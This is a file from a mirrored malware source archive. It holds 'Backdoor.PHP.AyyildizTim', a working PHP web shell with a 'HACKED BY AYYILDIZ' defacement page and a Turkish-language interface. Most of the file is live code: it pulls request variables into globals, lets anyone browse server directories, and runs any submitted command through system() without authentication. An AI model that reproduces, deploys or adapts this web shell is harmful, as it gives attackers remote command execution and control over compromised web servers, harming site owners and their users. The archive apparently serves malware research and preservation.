Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity
vxug-MalwareSourceCode/PHP/Backdoor.PHP.AyyildizTim

318 lines
9.9 KiB
Plaintext
Raw Permalink Blame History

<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
</head>
<body>
</body>
</html>
<html>
<head>
<meta name="distribution" content="GLOBAL">
<META name="ROBOTS" content="ALL">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="Copyright" content=TouCh By iJOo">
<META NAME="RATING" CONTENT="GENERAL">
<meta name="Description" content="Thehacker">
<meta name="KeyWords" content="DefaCed">
<title>HACKED BY AYYILDIZ ™</title>
<STYLE TYPE="text/css">
<!--
body {
scrollbar-3d-light-color : #404040;
scrollbar-arrow-color: black;
scrollbar-base-color: black;
scrollbar-darkshadow-color: #404040;
scrollbar-face-color: black;
scrollbar-highlight-color: #404040;
scrollbar-shadow-color: black;
scrollbar-track-color: #404040; }
-->
</STYLE>
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
</head>
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
<bgsound src="bayrak.mp3" loop="infinite">
<center><font color="red" size="10" face="Imprint MT Shadow">
</font>
<TR>
<TD vAlign=center align=left width=144>
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
</TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><BR>
<P align=left></P></TD></TR>
<TR>
<TD vAlign=center align=left width=144></TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
<STYLE>BODY {
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
}
.ldtab1 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab2 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab3 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtxt1 {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
}
.ldtxt2 {
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:link {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:visited {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:active {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:hover {
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
}
A {
TEXT-DECORATION: none
}
</STYLE>
<!-- MELEK -->
<DIV align=center>
<DIV id=welle
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
color=#ff0000></DIV></DIV>
<DIV align=center></DIV>
<SCRIPT language=JavaScript>
<!--
function welle()
{
if(document.all.welle.filters[0].freq > 10)
document.all.welle.filters[0].freq = 5;
document.all.welle.filters[0].freq += 1;
if(document.all.welle.filters[0].phase > 100)
document.all.welle.filters[0].phase = 0;
document.all.welle.filters[0].phase += 10;
if(document.all.welle.filters[0].strength > 10)
document.all.welle.filters[0].strength = 1;
document.all.welle.filters[0].strength += 1;
window.setTimeout("welle()",100);
}
welle();
file://-->
</SCRIPT>
</FONT></TD></TR></TBODY></TABLE></DIV>
<?php
define('PHPSHELL_VERSION', '');
?>
<html>
<head>
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
font-family: Tahoma;
font-size: 9px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<div align="center">
<table width="918" height="484" border="15">
<tr>
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
</div>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b></p>
<p align="center"><strong>Dizin Degistir</strong> :
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
</p>
<p align="center"><strong>Komut</strong>:
<input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Komut Calistir">
</p>
<p align="center"><strong>Surekli Bagli Kal</strong>
<input type="checkbox" name="stderr">
</p>
<div align="center">
<textarea name="textarea" cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</div>
</form>
<div align="center">
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
</div> <hr align="center"> <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
</tr>
</table>
</div>
</body>
</html>
</font></font></font></font></font></font></font></font></font></font></font>
</font>
<!--
/*
I Always Love Sha
*/
</BODY></HTML>
View Git Blame Copy Permalink